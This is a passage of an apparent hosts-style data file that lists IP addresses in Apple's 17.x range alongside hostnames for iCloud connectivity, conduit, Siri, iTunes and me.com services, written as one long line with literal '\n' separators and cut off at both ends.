r1s3i4.connectivity.me.com\n17.154.8.31 r1s3i5.connectivity.me.com\n17.154.8.32 r1s3i6.connectivity.me.com\n17.154.8.33 r1s3i7.connectivity.me.com\n17.154.8.34 r1s3i8.connectivity.me.com\n17.154.8.35 r1s4i1.connectivity.me.com\n17.154.8.36 r1s4i2.connectivity.me.com\n17.154.8.37 r1s4i3.connectivity.me.com\n17.154.8.38 r1s4i4.connectivity.me.com\n17.154.8.39 r1s4i5.connectivity.me.com\n17.154.8.40 r1s4i6.connectivity.me.com\n17.154.8.41 r1s4i7.connectivity.me.com\n17.154.8.42 r1s4i8.connectivity.me.com\n17.154.8.43 r1s5i1.connectivity.me.com\n17.154.8.44 r1s5i2.connectivity.me.com\n17.154.8.45 r1s5i3.connectivity.me.com\n17.154.8.46 r1s5i4.connectivity.me.com\n17.154.8.47 r1s5i5.connectivity.me.com\n17.154.8.48 r1s5i6.connectivity.me.com\n17.154.8.49 r1s5i7.connectivity.me.com\n17.154.8.50 r1s5i8.connectivity.me.com\n17.154.8.51 r1s6i1.connectivity.me.com\n17.154.8.52 r1s6i2.connectivity.me.com\n17.154.8.53 r1s6i3.connectivity.me.com\n17.154.8.54 r1s6i4.connectivity.me.com\n17.154.8.55 r1s6i5.connectivity.me.com\n17.154.8.56 r1s6i6.connectivity.me.com\n17.154.8.57 r1s6i7.connectivity.me.com\n17.154.8.58 r1s6i8.connectivity.me.com\n17.154.8.59 r1s7i1.connectivity.me.com\n17.154.8.60 r1s7i2.connectivity.me.com\n17.154.8.61 r1s7i3.connectivity.me.com\n17.154.8.62 r1s7i4.connectivity.me.com\n17.154.8.63 r1s7i5.connectivity.me.com\n17.154.8.64 r1s7i6.connectivity.me.com\n17.154.8.65 r1s7i7.connectivity.me.com\n17.154.8.66 r1s7i8.connectivity.me.com\n17.154.8.67 r1s8i1.connectivity.me.com\n17.154.8.68 r1s8i2.connectivity.me.com\n17.154.8.69 r1s8i3.connectivity.me.com\n17.154.8.70 r1s8i4.connectivity.me.com\n17.154.8.71 r1s8i5.connectivity.me.com\n17.154.8.72 r1s8i6.connectivity.me.com\n17.154.8.73 r1s8i7.connectivity.me.com\n17.154.8.74 r1s8i8.connectivity.me.com\n17.154.8.75 r1s9i1.connectivity.me.com\n17.154.8.76 r1s9i2.connectivity.me.com\n17.154.8.77 r1s9i3.connectivity.me.com\n17.154.8.78 r1s9i4.connectivity.me.com\n17.154.8.79 r1s9i5.connectivity.me.com\n17.154.8.80 r1s9i6.connectivity.me.com\n17.154.8.81 r1s9i7.connectivity.me.com\n17.154.8.82 r1s9i8.connectivity.me.com\n17.154.8.83 r1s10i1.connectivity.me.com\n17.154.8.84 r1s10i2.connectivity.me.com\n17.154.8.85 r1s10i3.connectivity.me.com\n17.154.8.86 r1s10i4.connectivity.me.com\n17.154.8.87 r1s10i5.connectivity.me.com\n17.154.8.88 r1s10i6.connectivity.me.com\n17.154.8.89 r1s10i7.connectivity.me.com\n17.154.8.90 r1s10i8.connectivity.me.com\n17.154.8.91 r1s11i1.connectivity.me.com\n17.154.8.92 r1s11i2.connectivity.me.com\n17.154.8.93 r1s11i3.connectivity.me.com\n17.154.8.94 r1s11i4.connectivity.me.com\n17.154.8.95 r1s11i5.connectivity.me.com\n17.154.8.96 r1s11i6.connectivity.me.com\n17.154.8.97 r1s11i7.connectivity.me.com\n17.154.8.98 r1s11i8.connectivity.me.com\n17.154.8.99 r1s12i1.connectivity.me.com\n17.154.8.100 r1s12i2.connectivity.me.com\n17.154.8.101 r1s12i3.connectivity.me.com\n17.154.8.102 r1s12i4.connectivity.me.com\n17.154.8.103 r1s12i5.connectivity.me.com\n17.154.8.104 r1s12i6.connectivity.me.com\n17.154.8.105 r1s12i7.connectivity.me.com\n17.154.8.106 r1s12i8.connectivity.me.com\n17.154.14.131 nk11r11-fileservices.me.com\n17.154.14.140 nk11r11-phoneservices.me.com\n17.154.14.148 nk11r11-syncservices.me.com\n17.154.14.151 nk11r11-webservices.mac.com\n17.154.14.152 nk11r11-webservices.me.com\n17.154.64.67 staging-carnival.itunes.apple.com\n17.154.66.13 itcusvc.itunes.apple.com\n17.154.66.40 storepreview.apple.com\n17.154.239.13 service-nk11-a.ess.apple.com\n17.154.239.14 service2-nk11-a.ess.apple.com\n17.154.239.16 service1-nk11-a.ess.apple.com\n17.155.4.8 invitation.ess.apple.com\n17.155.127.11 service-nk11-a.gc.apple.com\n17.155.127.14 service-nk11-b.gc.apple.com\n17.155.160.35 iphone-services-ls-nk11-ssl.apple.com\n17.155.160.103 mac-services-ssl.apple.com\n17.155.160.104 mac-services-ls-nk11.apple.com\n17.158.10.13 nk20203004c.connectivity.icloud.com\n17.158.10.15 nk20403004c.connectivity.icloud.com\n17.158.10.58 nk20503004c.connectivity.icloud.com\n17.158.10.59 nk20103004c.connectivity.icloud.com\n17.158.10.62 nk20803004c.connectivity.icloud.com\n17.158.10.96 nk20303001c.connectivity.icloud.com\n17.158.10.97 nk20703001c.connectivity.icloud.com\n17.158.10.98 nk20603001c.connectivity.icloud.com\n17.158.10.99 nk20203001c.connectivity.icloud.com\n17.158.10.100 nk20403001c.connectivity.icloud.com\n17.158.10.101 nk20803001c.connectivity.icloud.com\n17.158.10.102 nk20503001c.connectivity.icloud.com\n17.158.10.103 nk20103001c.connectivity.icloud.com\n17.158.10.104 p03-conduit.connectivity.icloud.com\n17.158.10.105 nk20303002c.connectivity.icloud.com\n17.158.10.106 nk20703002c.connectivity.icloud.com\n17.158.10.107 nk20603002c.connectivity.icloud.com\n17.158.10.108 nk20203002c.connectivity.icloud.com\n17.158.10.109 nk20403002c.connectivity.icloud.com\n17.158.10.110 nk20803002c.connectivity.icloud.com\n17.158.10.111 nk20503002c.connectivity.icloud.com\n17.158.10.112 nk20103002c.connectivity.icloud.com\n17.158.10.117 nk20303003c.connectivity.icloud.com\n17.158.10.118 nk20703003c.connectivity.icloud.com\n17.158.10.119 nk20603003c.connectivity.icloud.com\n17.158.10.120 nk20203003c.connectivity.icloud.com\n17.158.10.121 nk20403003c.connectivity.icloud.com\n17.158.10.122 nk20803003c.connectivity.icloud.com\n17.158.10.123 nk20503003c.connectivity.icloud.com\n17.158.10.124 nk20103003c.connectivity.icloud.com\n17.158.10.125 nk20303004c.connectivity.icloud.com\n17.158.10.126 nk20703004c.connectivity.icloud.com\n17.158.10.127 nk20603004c.connectivity.icloud.com\n17.158.28.85 nk20304001c.connectivity.icloud.com\n17.158.28.86 nk20704001c.connectivity.icloud.com\n17.158.28.87 nk20604001c.connectivity.icloud.com\n17.158.28.88 nk20204001c.connectivity.icloud.com\n17.158.28.89 nk20404001c.connectivity.icloud.com\n17.158.28.90 nk20804001c.connectivity.icloud.com\n17.158.28.91 nk20504001c.connectivity.icloud.com\n17.158.28.92 nk20104001c.connectivity.icloud.com\n17.158.28.93 p04-conduit.connectivity.icloud.com\n17.158.28.94 nk20304002c.connectivity.icloud.com\n17.158.28.95 nk20704002c.connectivity.icloud.com\n17.158.28.96 nk20604002c.connectivity.icloud.com\n17.158.28.97 nk20204002c.connectivity.icloud.com\n17.158.28.98 nk20404002c.connectivity.icloud.com\n17.158.28.99 nk20804002c.connectivity.icloud.com\n17.158.28.100 nk20504002c.connectivity.icloud.com\n17.158.28.101 nk20104002c.connectivity.icloud.com\n17.158.28.106 nk20304003c.connectivity.icloud.com\n17.158.28.107 nk20704003c.connectivity.icloud.com\n17.158.28.108 nk20604003c.connectivity.icloud.com\n17.158.28.109 nk20204003c.connectivity.icloud.com\n17.158.28.110 nk20404003c.connectivity.icloud.com\n17.158.28.111 nk20804003c.connectivity.icloud.com\n17.158.28.112 nk20504003c.connectivity.icloud.com\n17.158.28.113 nk20104003c.connectivity.icloud.com\n17.158.28.114 nk20304004c.connectivity.icloud.com\n17.158.28.115 nk20704004c.connectivity.icloud.com\n17.158.28.116 nk20604004c.connectivity.icloud.com\n17.158.28.117 nk20204004c.connectivity.icloud.com\n17.158.28.118 nk20404004c.connectivity.icloud.com\n17.158.28.119 nk20804004c.connectivity.icloud.com\n17.158.28.120 nk20504004c.connectivity.icloud.com\n17.158.28.121 nk20104004c.connectivity.icloud.com\n17.158.36.41 nk20307001c.connectivity.icloud.com\n17.158.36.51 nk20707001c.connectivity.icloud.com\n17.158.36.52 nk20607001c.connectivity.icloud.com\n17.158.36.80 nk20207001c.connectivity.icloud.com\n17.158.36.81 nk20407001c.connectivity.icloud.com\n17.158.36.82 nk20807001c.connectivity.icloud.com\n17.158.36.83 nk20507001c.connectivity.icloud.com\n17.158.36.84 nk20107001c.connectivity.icloud.com\n17.158.36.85 p07-conduit.connectivity.icloud.com\n17.158.36.86 nk20307002c.connectivity.icloud.com\n17.158.36.87 nk20707002c.connectivity.icloud.com\n17.158.36.88 nk20607002c.connectivity.icloud.com\n17.158.36.89 nk20207002c.connectivity.icloud.com\n17.158.36.90 nk20407002c.connectivity.icloud.com\n17.158.36.91 nk20807002c.connectivity.icloud.com\n17.158.36.92 nk20507002c.connectivity.icloud.com\n17.158.36.93 nk20107002c.connectivity.icloud.com\n17.158.36.98 nk20307003c.connectivity.icloud.com\n17.158.36.99 nk20707003c.connectivity.icloud.com\n17.158.36.100 nk20607003c.connectivity.icloud.com\n17.158.36.101 nk20207003c.connectivity.icloud.com\n17.158.36.102 nk20407003c.connectivity.icloud.com\n17.158.36.103 nk20807003c.connectivity.icloud.com\n17.158.36.104 nk20507003c.connectivity.icloud.com\n17.158.36.105 nk20107003c.connectivity.icloud.com\n17.158.36.106 nk20307004c.connectivity.icloud.com\n17.158.36.107 nk20707004c.connectivity.icloud.com\n17.158.36.108 nk20607004c.connectivity.icloud.com\n17.158.36.109 nk20207004c.connectivity.icloud.com\n17.158.36.110 nk20407004c.connectivity.icloud.com\n17.158.36.111 nk20807004c.connectivity.icloud.com\n17.158.36.112 nk20507004c.connectivity.icloud.com\n17.158.36.113 nk20107004c.connectivity.icloud.com\n17.158.52.41 nk20308001c.connectivity.icloud.com\n17.158.52.73 nk20708001c.connectivity.icloud.com\n17.158.52.74 nk20608001c.connectivity.icloud.com\n17.158.52.80 nk20208001c.connectivity.icloud.com\n17.158.52.81 nk20408001c.connectivity.icloud.com\n17.158.52.82 nk20808001c.connectivity.icloud.com\n17.158.52.83 nk20508001c.connectivity.icloud.com\n17.158.52.84 nk20108001c.connectivity.icloud.com\n17.158.52.85 p08-conduit.connectivity.icloud.com\n17.158.52.86 nk20308002c.connectivity.icloud.com\n17.158.52.87 nk20708002c.connectivity.icloud.com\n17.158.52.88 nk20608002c.connectivity.icloud.com\n17.158.52.89 nk20208002c.connectivity.icloud.com\n17.158.52.90 nk20408002c.connectivity.icloud.com\n17.158.52.91 nk20808002c.connectivity.icloud.com\n17.158.52.92 nk20508002c.connectivity.icloud.com\n17.158.52.93 nk20108002c.connectivity.icloud.com\n17.158.52.98 nk20308003c.connectivity.icloud.com\n17.158.52.99 nk20708003c.connectivity.icloud.com\n17.158.52.100 nk20608003c.connectivity.icloud.com\n17.158.52.101 nk20208003c.connectivity.icloud.com\n17.158.52.102 nk20408003c.connectivity.icloud.com\n17.158.52.103 nk20808003c.connectivity.icloud.com\n17.158.52.104 nk20508003c.connectivity.icloud.com\n17.158.52.105 nk20108003c.connectivity.icloud.com\n17.158.52.106 nk20308004c.connectivity.icloud.com\n17.158.52.107 nk20708004c.connectivity.icloud.com\n17.158.52.108 nk20608004c.connectivity.icloud.com\n17.158.52.109 nk20208004c.connectivity.icloud.com\n17.158.52.110 nk20408004c.connectivity.icloud.com\n17.158.52.111 nk20808004c.connectivity.icloud.com\n17.158.52.112 nk20508004c.connectivity.icloud.com\n17.158.52.113 nk20108004c.connectivity.icloud.com\n17.158.146.8 nk20001003.connectivity.icloud.com\n17.158.146.9 nk20101003.connectivity.icloud.com\n17.158.146.10 nk20201003.connectivity.icloud.com\n17.158.146.11 nk20301003.connectivity.icloud.com\n17.158.146.12 nk20401003.connectivity.icloud.com\n17.158.146.13 nk20501003.connectivity.icloud.com\n17.158.146.14 nk20601003.connectivity.icloud.com\n17.158.146.15 nk20701003.connectivity.icloud.com\n17.158.146.16 nk20001002.connectivity.icloud.com\n17.158.146.17 nk20101002.connectivity.icloud.com\n17.158.146.18 nk20201002.connectivity.icloud.com\n17.158.146.19 nk20301002.connectivity.icloud.com\n17.158.146.20 nk20401002.connectivity.icloud.com\n17.158.146.21 nk20501002.connectivity.icloud.com\n17.158.146.22 nk20601002.connectivity.icloud.com\n17.158.146.23 nk20701002.connectivity.icloud.com\n17.158.146.24 nk20001001.connectivity.icloud.com\n17.158.146.25 nk20101001.connectivity.icloud.com\n17.158.146.26 nk20201001.connectivity.icloud.com\n17.158.146.27 nk20301001.connectivity.icloud.com\n17.158.146.28 nk20401001.connectivity.icloud.com\n17.158.146.29 nk20501001.connectivity.icloud.com\n17.158.146.30 nk20601001.connectivity.icloud.com\n17.158.146.31 nk20701001.connectivity.icloud.com\n17.158.146.32 nk20002001.connectivity.icloud.com\n17.158.146.33 nk20102001.connectivity.icloud.com\n17.158.146.34 nk20202001.connectivity.icloud.com\n17.158.146.35 nk20302001.connectivity.icloud.com\n17.158.146.36 nk20402001.connectivity.icloud.com\n17.158.146.37 nk20502001.connectivity.icloud.com\n17.158.146.38 nk20602001.connectivity.icloud.com\n17.158.146.39 nk20702001.connectivity.icloud.com\n17.158.146.40 nk20002002.connectivity.icloud.com\n17.158.146.41 nk20102002.connectivity.icloud.com\n17.158.146.42 nk20202002.connectivity.icloud.com\n17.158.146.43 nk20302002.connectivity.icloud.com\n17.158.146.44 nk20402002.connectivity.icloud.com\n17.158.146.45 nk20502002.connectivity.icloud.com\n17.158.146.46 nk20602002.connectivity.icloud.com\n17.158.146.47 nk20702002.connectivity.icloud.com\n17.158.146.48 nk20002003.connectivity.icloud.com\n17.158.146.49 nk20102003.connectivity.icloud.com\n17.158.146.50 nk20202003.connectivity.icloud.com\n17.158.146.51 nk20302003.connectivity.icloud.com\n17.158.146.52 nk20402003.connectivity.icloud.com\n17.158.146.53 nk20502003.connectivity.icloud.com\n17.158.146.54 nk20602003.connectivity.icloud.com\n17.158.146.55 nk20702003.connectivity.icloud.com\n17.158.146.56 nk20003001.connectivity.icloud.com\n17.158.146.57 nk20103001.connectivity.icloud.com\n17.158.146.58 nk20203001.connectivity.icloud.com\n17.158.146.59 nk20303001.connectivity.icloud.com\n17.158.146.60 nk20403001.connectivity.icloud.com\n17.158.146.61 nk20503001.connectivity.icloud.com\n17.158.146.62 nk20603001.connectivity.icloud.com\n17.158.146.63 nk20703001.connectivity.icloud.com\n17.158.146.64 nk20003002.connectivity.icloud.com\n17.158.146.65 nk20103002.connectivity.icloud.com\n17.158.146.66 nk20203002.connectivity.icloud.com\n17.158.146.67 nk20303002.connectivity.icloud.com\n17.158.146.68 nk20403002.connectivity.icloud.com\n17.158.146.69 nk20503002.connectivity.icloud.com\n17.158.146.70 nk20603002.connectivity.icloud.com\n17.158.146.71 nk20703002.connectivity.icloud.com\n17.158.146.72 nk20003003.connectivity.icloud.com\n17.158.146.73 nk20103003.connectivity.icloud.com\n17.158.146.74 nk20203003.connectivity.icloud.com\n17.158.146.75 nk20303003.connectivity.icloud.com\n17.158.146.76 nk20403003.connectivity.icloud.com\n17.158.146.77 nk20503003.connectivity.icloud.com\n17.158.146.78 nk20603003.connectivity.icloud.com\n17.158.146.79 nk20703003.connectivity.icloud.com\n17.158.146.80 nk20004001.connectivity.icloud.com\n17.158.146.81 nk20104001.connectivity.icloud.com\n17.158.146.82 nk20204001.connectivity.icloud.com\n17.158.146.83 nk20304001.connectivity.icloud.com\n17.158.146.84 nk20404001.connectivity.icloud.com\n17.158.146.85 nk20504001.connectivity.icloud.com\n17.158.146.86 nk20604001.connectivity.icloud.com\n17.158.146.87 nk20704001.connectivity.icloud.com\n17.158.146.88 nk20004002.connectivity.icloud.com\n17.158.146.89 nk20104002.connectivity.icloud.com\n17.158.146.90 nk20204002.connectivity.icloud.com\n17.158.146.91 nk20304002.connectivity.icloud.com\n17.158.146.92 nk20404002.connectivity.icloud.com\n17.158.146.93 nk20504002.connectivity.icloud.com\n17.158.146.94 nk20604002.connectivity.icloud.com\n17.158.146.95 nk20704002.connectivity.icloud.com\n17.158.146.96 nk20004003.connectivity.icloud.com\n17.158.146.97 nk20104003.connectivity.icloud.com\n17.158.146.98 nk20204003.connectivity.icloud.com\n17.158.146.99 nk20304003.connectivity.icloud.com\n17.158.146.100 nk20404003.connectivity.icloud.com\n17.158.146.101 nk20504003.connectivity.icloud.com\n17.158.146.102 nk20604003.connectivity.icloud.com\n17.158.146.103 nk20704003.connectivity.icloud.com\n17.158.146.104 nk20005001.connectivity.icloud.com\n17.158.146.105 nk20105001.connectivity.icloud.com\n17.158.146.106 nk20205001.connectivity.icloud.com\n17.158.146.107 nk20305001.connectivity.icloud.com\n17.158.146.108 nk20405001.connectivity.icloud.com\n17.158.146.109 nk20505001.connectivity.icloud.com\n17.158.146.110 nk20605001.connectivity.icloud.com\n17.158.146.111 nk20705001.connectivity.icloud.com\n17.158.146.112 nk20005002.connectivity.icloud.com\n17.158.146.113 nk20105002.connectivity.icloud.com\n17.158.146.114 nk20205002.connectivity.icloud.com\n17.158.146.115 nk20305002.connectivity.icloud.com\n17.158.146.116 nk20405002.connectivity.icloud.com\n17.158.146.117 nk20505002.connectivity.icloud.com\n17.158.146.118 nk20605002.connectivity.icloud.com\n17.158.146.119 nk20705002.connectivity.icloud.com\n17.158.146.120 nk20005003.connectivity.icloud.com\n17.158.146.121 nk20105003.connectivity.icloud.com\n17.158.146.122 nk20205003.connectivity.icloud.com\n17.158.146.123 nk20305003.connectivity.icloud.com\n17.158.146.124 nk20405003.connectivity.icloud.com\n17.158.146.125 nk20505003.connectivity.icloud.com\n17.158.146.126 nk20605003.connectivity.icloud.com\n17.158.146.127 nk20705003.connectivity.icloud.com\n17.158.146.128 nk20006001.connectivity.icloud.com\n17.158.146.129 nk20106001.connectivity.icloud.com\n17.158.146.130 nk20206001.connectivity.icloud.com\n17.158.146.131 nk20306001.connectivity.icloud.com\n17.158.146.132 nk20406001.connectivity.icloud.com\n17.158.146.133 nk20506001.connectivity.icloud.com\n17.158.146.134 nk20606001.connectivity.icloud.com\n17.158.146.135 nk20706001.connectivity.icloud.com\n17.158.146.136 nk20006002.connectivity.icloud.com\n17.158.146.137 nk20106002.connectivity.icloud.com\n17.158.146.138 nk20206002.connectivity.icloud.com\n17.158.146.139 nk20306002.connectivity.icloud.com\n17.158.146.140 nk20406002.connectivity.icloud.com\n17.158.146.141 nk20506002.connectivity.icloud.com\n17.158.146.142 nk20606002.connectivity.icloud.com\n17.158.146.143 nk20706002.connectivity.icloud.com\n17.158.146.144 nk20006003.connectivity.icloud.com\n17.158.146.145 nk20106003.connectivity.icloud.com\n17.158.146.146 nk20206003.connectivity.icloud.com\n17.158.146.147 nk20306003.connectivity.icloud.com\n17.158.146.148 nk20406003.connectivity.icloud.com\n17.158.146.149 nk20506003.connectivity.icloud.com\n17.158.146.150 nk20606003.connectivity.icloud.com\n17.158.146.151 nk20706003.connectivity.icloud.com\n17.158.146.152 nk20007001.connectivity.icloud.com\n17.158.146.153 nk20107001.connectivity.icloud.com\n17.158.146.154 nk20207001.connectivity.icloud.com\n17.158.146.155 nk20307001.connectivity.icloud.com\n17.158.146.156 nk20407001.connectivity.icloud.com\n17.158.146.157 nk20507001.connectivity.icloud.com\n17.158.146.158 nk20607001.connectivity.icloud.com\n17.158.146.159 nk20707001.connectivity.icloud.com\n17.158.146.160 nk20007002.connectivity.icloud.com\n17.158.146.161 nk20107002.connectivity.icloud.com\n17.158.146.162 nk20207002.connectivity.icloud.com\n17.158.146.163 nk20307002.connectivity.icloud.com\n17.158.146.164 nk20407002.connectivity.icloud.com\n17.158.146.165 nk20507002.connectivity.icloud.com\n17.158.146.166 nk20607002.connectivity.icloud.com\n17.158.146.167 nk20707002.connectivity.icloud.com\n17.158.146.168 nk20007003.connectivity.icloud.com\n17.158.146.169 nk20107003.connectivity.icloud.com\n17.158.146.170 nk20207003.connectivity.icloud.com\n17.158.146.171 nk20307003.connectivity.icloud.com\n17.158.146.172 nk20407003.connectivity.icloud.com\n17.158.146.173 nk20507003.connectivity.icloud.com\n17.158.146.174 nk20607003.connectivity.icloud.com\n17.158.146.175 nk20707003.connectivity.icloud.com\n17.158.146.176 nk20008001.connectivity.icloud.com\n17.158.146.177 nk20108001.connectivity.icloud.com\n17.158.146.178 nk20208001.connectivity.icloud.com\n17.158.146.179 nk20308001.connectivity.icloud.com\n17.158.146.180 nk20408001.connectivity.icloud.com\n17.158.146.181 nk20508001.connectivity.icloud.com\n17.158.146.182 nk20608001.connectivity.icloud.com\n17.158.146.183 nk20708001.connectivity.icloud.com\n17.158.146.184 nk20008002.connectivity.icloud.com\n17.158.146.185 nk20108002.connectivity.icloud.com\n17.158.146.186 nk20208002.connectivity.icloud.com\n17.158.146.187 nk20308002.connectivity.icloud.com\n17.158.146.188 nk20408002.connectivity.icloud.com\n17.158.146.189 nk20508002.connectivity.icloud.com\n17.158.146.190 nk20608002.connectivity.icloud.com\n17.158.146.191 nk20708002.connectivity.icloud.com\n17.158.146.192 nk20008003.connectivity.icloud.com\n17.158.146.193 nk20108003.connectivity.icloud.com\n17.158.146.194 nk20208003.connectivity.icloud.com\n17.158.146.195 nk20308003.connectivity.icloud.com\n17.158.146.196 nk20408003.connectivity.icloud.com\n17.158.146.197 nk20508003.connectivity.icloud.com\n17.158.146.198 nk20608003.connectivity.icloud.com\n17.158.146.199 nk20708003.connectivity.icloud.com\n17.158.146.224 nk20009001.connectivity.icloud.com\n17.158.146.225 nk20109001.connectivity.icloud.com\n17.158.146.226 nk20209001.connectivity.icloud.com\n17.158.146.227 nk20309001.connectivity.icloud.com\n17.158.146.228 nk20409001.connectivity.icloud.com\n17.158.146.229 nk20509001.connectivity.icloud.com\n17.158.146.230 nk20609001.connectivity.icloud.com\n17.158.146.231 nk20709001.connectivity.icloud.com\n17.158.146.232 nk20009002.connectivity.icloud.com\n17.158.146.233 nk20109002.connectivity.icloud.com\n17.158.146.234 nk20209002.connectivity.icloud.com\n17.158.146.235 nk20309002.connectivity.icloud.com\n17.158.146.236 nk20409002.connectivity.icloud.com\n17.158.146.237 nk20509002.connectivity.icloud.com\n17.158.146.238 nk20609002.connectivity.icloud.com\n17.158.146.239 nk20709002.connectivity.icloud.com\n17.158.146.240 nk20009003.connectivity.icloud.com\n17.158.146.241 nk20109003.connectivity.icloud.com\n17.158.146.242 nk20209003.connectivity.icloud.com\n17.158.146.243 nk20309003.connectivity.icloud.com\n17.158.146.244 nk20409003.connectivity.icloud.com\n17.158.146.245 nk20509003.connectivity.icloud.com\n17.158.146.246 nk20609003.connectivity.icloud.com\n17.158.146.247 nk20709003.connectivity.icloud.com\n17.158.146.248 nk20010001.connectivity.icloud.com\n17.158.146.249 nk20110001.connectivity.icloud.com\n17.158.146.250 nk20210001.connectivity.icloud.com\n17.158.146.251 nk20310001.connectivity.icloud.com\n17.158.146.252 nk20410001.connectivity.icloud.com\n17.158.146.253 nk20510001.connectivity.icloud.com\n17.158.146.254 nk20610001.connectivity.icloud.com\n17.158.146.255 nk20710001.connectivity.icloud.com\n17.158.147.0 nk20010002.connectivity.icloud.com\n17.158.147.1 nk20110002.connectivity.icloud.com\n17.158.147.2 nk20210002.connectivity.icloud.com\n17.158.147.3 nk20310002.connectivity.icloud.com\n17.158.147.4 nk20410002.connectivity.icloud.com\n17.158.147.5 nk20510002.connectivity.icloud.com\n17.158.147.6 nk20610002.connectivity.icloud.com\n17.158.147.7 nk20710002.connectivity.icloud.com\n17.158.147.8 nk20010003.connectivity.icloud.com\n17.158.147.9 nk20110003.connectivity.icloud.com\n17.158.147.10 nk20210003.connectivity.icloud.com\n17.158.147.11 nk20310003.connectivity.icloud.com\n17.158.147.12 nk20410003.connectivity.icloud.com\n17.158.147.13 nk20510003.connectivity.icloud.com\n17.158.147.14 nk20610003.connectivity.icloud.com\n17.158.147.15 nk20710003.connectivity.icloud.com\n17.164.0.34 st10309001c.connectivity.icloud.com\n17.164.0.35 st10709001c.connectivity.icloud.com\n17.164.0.38 st10609001c.connectivity.icloud.com\n17.164.0.44 st10209001c.connectivity.icloud.com\n17.164.0.47 st10409001c.connectivity.icloud.com\n17.164.0.58 st10809001c.connectivity.icloud.com\n17.164.0.59 st10509001c.connectivity.icloud.com\n17.164.0.63 st10109001c.connectivity.icloud.com\n17.164.0.64 p09-conduit.connectivity.icloud.com\n17.164.0.65 st10309002c.connectivity.icloud.com\n17.164.0.66 st10709002c.connectivity.icloud.com\n17.164.0.67 st10609002c.connectivity.icloud.com\n17.164.0.68 st10209002c.connectivity.icloud.com\n17.164.0.69 st10409002c.connectivity.icloud.com\n17.164.0.70 st10809002c.connectivity.icloud.com\n17.164.0.81 st10509002c.connectivity.icloud.com\n17.164.0.89 st10109002c.connectivity.icloud.com\n17.164.0.98 st10309004c.connectivity.icloud.com\n17.164.0.99 st10709004c.connectivity.icloud.com\n17.164.0.100 st10609004c.connectivity.icloud.com\n17.164.0.101 st10209004c.connectivity.icloud.com\n17.164.0.102 st10409004c.connectivity.icloud.com\n17.164.0.103 st10809004c.connectivity.icloud.com\n17.164.0.104 st10509004c.connectivity.icloud.com\n17.164.0.105 st10109004c.connectivity.icloud.com\n17.164.0.106 st10309003c.connectivity.icloud.com\n17.164.0.107 st10709003c.connectivity.icloud.com\n17.164.0.108 st10609003c.connectivity.icloud.com\n17.164.0.109 st10209003c.connectivity.icloud.com\n17.164.0.110 st10409003c.connectivity.icloud.com\n17.164.0.111 st10809003c.connectivity.icloud.com\n17.164.0.112 st10509003c.connectivity.icloud.com\n17.164.0.113 st10109003c.connectivity.icloud.com\n17.164.1.35 enroll.vpp.itunes.apple.com\n17.165.180.10 st14p03sa-vc001.siri.apple.com\n17.165.192.10 st14p04sa-vc001.siri.apple.com\n17.167.135.58 p11-conduit.connectivity.icloud.com\n17.167.135.86 st10111001c.connectivity.icloud.com\n17.167.135.87 st10111002c.connectivity.icloud.com\n17.167.135.88 st10111003c.connectivity.icloud.com\n17.167.135.89 st10111004c.connectivity.icloud.com\n17.167.135.90 st10211001c.connectivity.icloud.com\n17.167.135.91 st10211002c.connectivity.icloud.com\n17.167.135.92 st10211003c.connectivity.icloud.com\n17.167.135.93 st10211004c.connectivity.icloud.com\n17.167.135.94 st10311001c.connectivity.icloud.com\n17.167.135.95 st10311002c.connectivity.icloud.com\n17.167.135.96 st10311003c.connectivity.icloud.com\n17.167.135.97 st10311004c.connectivity.icloud.com\n17.167.135.98 st10411001c.connectivity.icloud.com\n17.167.135.99 st10411002c.connectivity.icloud.com\n17.167.135.100 st10411003c.connectivity.icloud.com\n17.167.135.101 st10411004c.connectivity.icloud.com\n17.167.135.102 st10511001c.connectivity.icloud.com\n17.167.135.103 st10511002c.connectivity.icloud.com\n17.167.135.104 st10511003c.connectivity.icloud.com\n17.167.135.105 st10511004c.connectivity.icloud.com\n17.167.135.106 st10611001c.connectivity.icloud.com\n17.167.135.107 st10611002c.connectivity.icloud.com\n17.167.135.108 st10611003c.connectivity.icloud.com\n17.167.135.109 st10611004c.connectivity.icloud.com\n17.167.135.110 st10711001c.connectivity.icloud.com\n17.167.135.111 st10711002c.connectivity.icloud.com\n17.167.135.112 st10711003c.connectivity.icloud.com\n17.167.135.113 st10711004c.connectivity.icloud.com\n17.167.135.114 st10811001c.connectivity.icloud.com\n17.167.135.115 st10811002c.connectivity.icloud.com\n17.167.135.116 st10811003c.connectivity.icloud.com\n17.167.135.117 st10811004c.connectivity.icloud.com\n17.167.136.13 p13-conduit.connectivity.icloud.com\n17.167.136.44 st10113001c.connectivity.icloud.com\n17.167.136.45 st10113002c.connectivity.icloud.com\n17.167.136.46 st10113003c.connectivity.icloud.com\n17.167.136.47 st10113004c.connectivity.icloud.com\n17.167.136.48 st10213001c.connectivity.icloud.com\n17.167.136.49 st10213002c.connectivity.icloud.com\n17.167.136.50 st10213003c.connectivity.icloud.com\n17.167.136.51 st10213004c.connectivity.icloud.com\n17.167.136.52 st10313001c.connectivity.icloud.com\n17.167.136.53 st10313002c.connectivity.icloud.com\n17.167.136.54 st10313003c.connectivity.icloud.com\n17.167.136.55 st10313004c.connectivity.icloud.com\n17.167.136.56 st10413001c.connectivity.icloud.com\n17.167.136.57 st10413002c.connectivity.icloud.com\n17.167.136.58 st10413003c.connectivity.icloud.com\n17.167.136.59 st10413004c.connectivity.icloud.com\n17.167.136.60 st10513001c.connectivity.icloud.com\n17.167.136.61 st10513002c.connectivity.icloud.com\n17.167.136.62 st10513003c.connectivity.icloud.com\n17.167.136.63 st10513004c.connectivity.icloud.com\n17.167.136.64 st10613001c.connectivity.icloud.com\n17.167.136.65 st10613002c.connectivity.icloud.com\n17.167.136.66 st10613003c.connectivity.icloud.com\n17.167.136.67 st10613004c.connectivity.icloud.com\n17.167.136.68 st10713001c.connectivity.icloud.com\n17.167.136.69 st10713002c.connectivity.icloud.com\n17.167.136.70 st10713003c.connectivity.icloud.com\n17.167.136.71 st10713004c.connectivity.icloud.com\n17.167.136.72 st10813001c.connectivity.icloud.com\n17.167.136.73 st10813002c.connectivity.icloud.com\n17.167.136.74 st10813003c.connectivity.icloud.com\n17.167.136.75 st10813004c.connectivity.icloud.com\n17.167.137.47 p15-conduit.connectivity.icloud.com\n17.167.137.48 st10115001c.connectivity.icloud.com\n17.167.137.49 st10115002c.connectivity.icloud.com\n17.167.137.50 st10115003c.connectivity.icloud.com\n17.167.137.51 st10115004c.connectivity.icloud.com\n17.167.137.52 st10215001c.connectivity.icloud.com\n17.167.137.53 st10215002c.connectivity.icloud.com\n17.167.137.54 